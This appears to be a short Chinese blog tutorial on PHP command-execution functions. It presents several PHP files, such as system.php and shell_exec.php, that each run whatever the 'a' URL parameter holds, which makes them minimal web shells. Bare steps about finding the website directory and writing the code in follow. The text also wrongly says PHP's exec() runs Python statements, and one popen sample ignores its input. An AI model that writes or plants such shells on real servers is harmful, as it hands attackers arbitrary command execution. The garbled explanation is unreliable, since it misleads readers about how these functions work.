system()
文件命名为system.php
<?php
if(isset($_GET['a'])){
system($_GET['a']);
}
else{
echo "Please input a";
}
?>

exec ()执行储存在字符串或文件中的 Python 语句,相比于 eval,exec可以执行更复杂的 Python 代码。
文件命名为exec.php
<?php
if(isset($_GET['a'])){
echo exec($_GET['a']);
}
else{
echo "Please input a";
}
?>

shell_exec()
文件命名为shell_exec.php
<?php
if(isset($_GET['a'])){
echo shell_exec($_GET['a']);
}
else{
echo "Please input a";
}
?>

passthru()
文件命名为passthru.php
<?php
if(isset($_GET['a'])){
passthru($_GET['a']);
}
else{
echo "Please input a";
}
?>

popen()
文件命名为popen.php
<?php
if(isset($_GET['a'])){
popen("whoami >> 1.txt",'r');
}else{
echo "Please input a";
}
?>

编写1.txt文档

文件命名为fdyh.php
<?php
if(isset($_GET['a'])){
echo `whoami`;
}else{
echo "Please input a";
}
?>


找到网站目录

进行代码写入


进行验证

本文介绍了PHP中的几个关键函数,如system(), exec(), shell_exec(), passthru()和popen(),它们都涉及到命令执行。这些函数如果使用不当,可能导致命令注入漏洞,允许攻击者执行任意系统命令。通过1.txt文档的编写和网站目录的查找,展示了如何利用这些函数进行潜在的安全攻击。请务必确保在使用这些功能时进行适当的输入验证和安全措施。

被折叠的 条评论
为什么被折叠?



